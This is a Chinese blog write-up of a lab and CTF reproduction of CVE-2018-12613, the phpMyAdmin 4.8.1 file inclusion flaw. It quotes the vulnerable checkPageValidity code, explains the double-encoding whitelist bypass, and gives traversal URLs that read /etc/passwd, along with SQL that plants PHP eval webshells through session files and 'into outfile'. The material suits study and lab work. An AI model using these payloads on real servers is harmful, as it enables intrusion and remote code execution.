phpmyadmin4.8.1远程文件包含漏洞(CVE-2018-12613)

已于 2022-10-12 20:00:48 修改
阅读量2.7k 收藏 10
点赞数 2
分类专栏: 漏洞复现 文章标签: php 开发语言
于 2022-10-08 19:02:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63231007/article/details/126902307
版权

Vulhub 复现

漏洞介绍:

phpmyadmin 4.8.1 远程文件包含漏洞

其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞

漏洞影响版本:

phpmyadmin 4.8.0-4.8.1

漏洞环境

进入 vulhub/phpmyadmin/CVE-2018-12613

docker-compose up -d 开启环境

docker ps 查看开启的环境  开放了8080端口

 漏洞利用方式一:

        利用路径遍历去包含任意文件

        exp:?target=db_sql.php%253f../../../../../../../../etc/passwd

        如下 [GWCTF 2019]我有一个数据库 所示

利用方式二:

        写入代码或一句话🐎来包含

1. 执行SQL语句查询数据库路径。结果为: /var/lib/mysql/

2. 向数据库写入php代码。创建数据库rce和表rce,并插入php代码

CREATE DATABASE test;
use test;
CREATE TABLE test(code varchar(100));
INSERT INTO test(code) VALUES("<?php phpinfo(); ?>");

 但是在执行第一步时,Access denied for user 'test'@'%' to database 'test'

那就直接在已有的test表中 执行下三行sql语句

 然后我们可以看到我们插入的php代码

 3. 在SQL中执行select ‘<?php phpinfo() ?>’,然后查看当前页面cookie中的phpmyadmin的值

4. 构建包含Session值的URL路径(包含session文件)

访问 ?target=db_sql.php%253f/../../../../../../../../../../tmp/sess_[session]

?target=db_sql.php%253f/../../../../../../../../../../tmp/sess_301a0d20744204ae1284de3d6970df57

5. session中写入一句话木马然后包含session

select "<?php eval($_GET[a]); ?>"

之后 查看内存中cookie的 phpmyadmin值

 ?target=db_sql.php%253f/../../../../../../../../../../tmp/sess_e32b4aca7bc964332d05919257e58e81

可以造成命令执行,但是antsword连接不了,不知道是工具原因还是什么原因

6.. 在phpInfo默认页面找到网站的安装位置:/var/www/html,然后写入一句话木马

 sql语句写入一句话木马   into outfile

select '<?php @eval($_POST["1vxyz"]) ?>' into outfile '/var/www/html/hack.php'

报错了,,,

 此sql写入文件漏洞是登陆后才可以使用的,比较无用。一般登陆后直接执行SQL语句生成shell即可,但有时目录权限比较严格,不能在WEB目录内生成,则可以结合本例使用。

[GWCTF 2019]我有一个数据库

打开题目看到的是乱码,修复文字编码后

扫一下目录 扫出来了 /phpinfo.php /phpmyadmin

 结合题目,这道题应该就是考察的phpmyadmin数据库的知识点

搜索 4.8.1 版本的phpmyadmin,发现存在 远程文件包含漏洞

看一下漏洞存在点 的代码 关于target的部分

$target_blacklist = array (
    'import.php', 'export.php'
);

// If we have a valid target, let's load that script instead
if (! empty($_REQUEST['target'])
    && is_string($_REQUEST['target'])
    && ! preg_match('/^index/', $_REQUEST['target'])
    && ! in_array($_REQUEST['target'], $target_blacklist)
    && Core::checkPageValidity($_REQUEST['target'])
) {
    include $_REQUEST['target'];
    exit;
}

满足以下五个条件就会进行文件包含( include $_REQUEST['target'];)

  •     $_REQUEST['target'] 不为空
  •  $_REQUEST['target'] 参数携带的内容是字符串
  •  $_REQUEST['target'] 不以index开头
  • $_REQUEST['target'] 搜索数组$target_blacklist 中不存在指定的值( ‘import.php’, ‘export.php’)
  • Core::checkPageValidity($_REQUEST['target']) 为真

我们看一下Core::checkPageValidity()方法 存在于libraries/classes/Core.php中443行:

public static function checkPageValidity(&$page, array $whitelist = [])
    {
        if (empty($whitelist)) {
            $whitelist = self::$goto_whitelist;
        }
        if (! isset($page) || !is_string($page)) {
            return false;
        }

        if (in_array($page, $whitelist)) {
            return true;
        }

        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        $_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        return false;
    }

函数作用为:

$whitelist 为空就引用申明的 $goto_whitelist;
$page 如果没有定义或者 $page 不为字符串就返回 false;
$page 如果存在在 $whitelist 中返回 true;
如果 $_page 存在在 $whitelist 中返回 true;
经过 urldecode 函数解码后的 $_page 存在在 $whitelist 中返回 true。

    判断?前面的内容是否在白名单中,是则返回true。但是函数并没有对输入的参数做修改,截取的结果都保存在$_page中,所以target只需前面为白名单%3F或者白名单%253F(?两次url编码)就可以绕过Core::checkPageValidity方法的白名单检测

    [HCTF 2018]WarmUp 就考察的这个点

$goto_whitelist 里的内容:

public static $goto_whitelist = array(
        'db_datadict.php',
        'db_sql.php',
        'db_events.php',
        'db_export.php',
        'db_importdocsql.php',
        'db_multi_table_query.php',
        'db_structure.php',
        'db_import.php',
        'db_operations.php',
        'db_search.php',
        'db_routines.php',
        'export.php',
        'import.php',
        'index.php',
        'pdf_pages.php',
        'pdf_schema.php',
        'server_binlog.php',
        'server_collations.php',
        'server_databases.php',
        'server_engines.php',
        'server_export.php',
        'server_import.php',
        'server_privileges.php',
        'server_sql.php',
        'server_status.php',
        'server_status_advisor.php',
        'server_status_monitor.php',
        'server_status_queries.php',
        'server_status_variables.php',
        'server_variables.php',
        'sql.php',
        'tbl_addfield.php',
        'tbl_change.php',
        'tbl_create.php',
        'tbl_import.php',
        'tbl_indexes.php',
        'tbl_sql.php',
        'tbl_export.php',
        'tbl_operations.php',
        'tbl_structure.php',
        'tbl_relation.php',
        'tbl_replace.php',
        'tbl_row_action.php',
        'tbl_select.php',
        'tbl_zoom_select.php',
        'transformation_overview.php',
        'transformation_wrapper.php',
        'user_password.php',
);

所以就可以实现任意文件包含:

?target=db_sql.php%253f../../../../../../../../etc/passwd

 ?target=db_sql.php%253f../../../../../../../../flag 得到flag

 

葫芦娃42
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpmyadmin 4.8.1漏洞复现(实战演示)
weixin_49071539的博客
12-21 1599
第一步,根据该版本CVE漏洞构造URL,在index.php后添加内容,如显示/etc/passwd详细内容。 /* 方法一 */ http://localhost:8088/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd /* 方法二 */ http://localhost:8088/phpmyadmin/index.php?target=db_datadict.php%253f/../../.
Adminer≤4.6.2任意文件读取漏洞1
08-03
Adminer≤4.6.2 任意件读取漏洞0x01 前SQLite、PostgreSQL 等众多主流数据库,类似于 phpMyAdmin 的 MySQL 管理客
phpmyadmin 4.8.1 远程文件包含漏洞
永不垂头的博客
08-14 515
phpmyadmin 4.8.1 远程文件包含漏洞 文章目录phpmyadmin 4.8.1 远程文件包含漏洞一、漏洞详情二、漏洞复现1.任意文件包含2.任意代码执行3.向数据库写入php代码4.包函session文件三、我的公众号 一、漏洞详情 首先在index.php 50-67行代码 满足5个条件后就会include$_REQUEST[‘target’]的内容 $_REQUEST[‘target’]不为空 $_REQUEST[‘target’]是字符串 $_REQUEST[‘target’]不
phpmyadmin漏洞汇总
最新发布
m0_64481831的博客
05-27 997
phpmyadmin是一个以PHP为基础,以web方式架构在网站主机上的mysql的数据库管理工具,让管理者可用web接口管理mysql数据库,便于远端管理mysql数据库。
phpmyadminV4.8.1本地文件包含漏洞复现
seek_2022的博客
07-05 2769
出于学习和技术分享的目的,本文针对phpMyadmin-v4.8.1存在的文件包含漏洞,通过代码审计结合本地搭建测试环境的方式进行漏洞复现研究,以供大家参考学习。
phpMyAdmin 4.8.1 本地文件包含漏洞复现
weixin_51681694的博客
04-22 469
漏洞点在根目录下的index.php中的61行target传参可任意控制,控制index.php包含任意文件上面的if条件需要满足target且为且且中黑名单:查看最后一个条件,需要返回true第一个红框定义白名单第二个红框检查文件名是否在白名单中,在则返回true第三个红框将原传入字符串从0到?前分割出来,再检查字符串是否在白名单中,在则返回true可以考虑设置字符串内容?之前的字符串为白名单,绕过过滤,可是?不能出现在文件名中最后则是利用点。
什么?postgresql报错!!!一行命令搞定
qq_48885546的博客
12-12 367
postgresql·报错
CVE-2018-12613 PHPmyadmin文件包含漏洞
m0_48736242的博客
10-14 702
CVE-2018-12613 PHPmyadmin文件包含漏洞
phpmyadmin 远程文件包含漏洞CVE-2018-12613) - tdcoming'blog QQ group 906
08-04
漏洞背景背景介绍phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具…阅读数 156博文CVE-2018-12613 --- 本地文件包含造成
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
03-05
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
phpMyAdmin4.8.1
07-06
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。也可借由phpMyAdmin建立常用的php语法,方便编写网页时所需要的sql语法正确性。
基于PHPadminerv4.8.1取代phpmyadmin的在线管理mysql好工具源码.zip
07-29
基于PHPadminerv4.8.1取代phpmyadmin的在线管理mysql好工具源码.zip
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin所有的 4.6.x 版本(直至 4.6.3),4.4.x ...
phpmyadmin漏洞_phpmyadmin 4.8.1 远程文件包含漏洞CVE201812613
weixin_39613561的博客
12-06 136
文章来源:黑白之道phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。启动phpmyadmin 4.8.1:环境启动后,访问http://your-ip:8080,即可进入phpmyadmin。配置的是“config”模式,所以无需输入密码,直接登录test账户。访问http...
CVE-2018-12613Phpmyadmin后台 任意文件包含漏洞复现
weixin_55821558的博客
04-26 747
环境:php 5.5.30 工具:phpstudy(小皮面板) 这个漏洞是源于phpmyadmin中的index.php,下面是源码: 以上进行一下分析: 1.传入的target不能为空 2.必须是一个字符串 3.不能以index开头 4.不能再数组target_blacklist中 5.且经过checkPageValidit检查后为真 首先前三个都很好理解 我们先看一下第四个 黑名单为: 在index.php中,已经事先定义了target_blacklist的值,即import.php和ex
渗透测试-目录遍历漏洞
aming小老弟
06-26 2694
目录遍历
phpmyadmin 4.8.1 远程文件包含漏洞CVE-2018-12613
EC_Carrot的博客
07-20 182
漏洞简介 phpMyAdminphpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 phpMyAdmin 4.8.2之前的4.8.x版本中存在安全漏洞。攻击者可利用该漏洞包含(查看并可能执行)服务器上的文件。 漏洞复现 访问http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 可见
PhpMyAdmin4.8.1后台文件包含漏洞复现(CVE-2018-12613)
hclimg的博客
10-30 2297
phpmyadmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞漏洞复现环境:基于某平台的在线靶场进行漏洞复现 复现过程: 1. 访问网址,是一处phpmyadmin的登录地址首页,通过弱密码可以进入数据库管理界面 2. 根据在网上曝光的CVE-2018-1...
CVE-2016-5734
09-04
CVE-2016-5734是一个针对PHPMyAdmin漏洞,该漏洞允许远程攻击者执行任意命令。该漏洞可以通过使用提供的Python脚本来利用,脚本可以在指定的URL上执行特定命令。如果你想进一步了解该漏洞以及如何分析它,可以参考提供的链接。如果你想在本地环境中测试该漏洞,可以下载并安装vulhub,并进入/vulhub/phpmyadmin/CVE-2016-5734目录,然后使用提供的命令启动环境。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [buuctf [PHPMYADMIN]CVE-2016-5734](https://blog.csdn.net/qq_36241198/article/details/115017777)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CVE-2016-5734 Phpmyadmin后台代码执行漏洞复现](https://blog.csdn.net/weixin_41924764/article/details/113063083)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值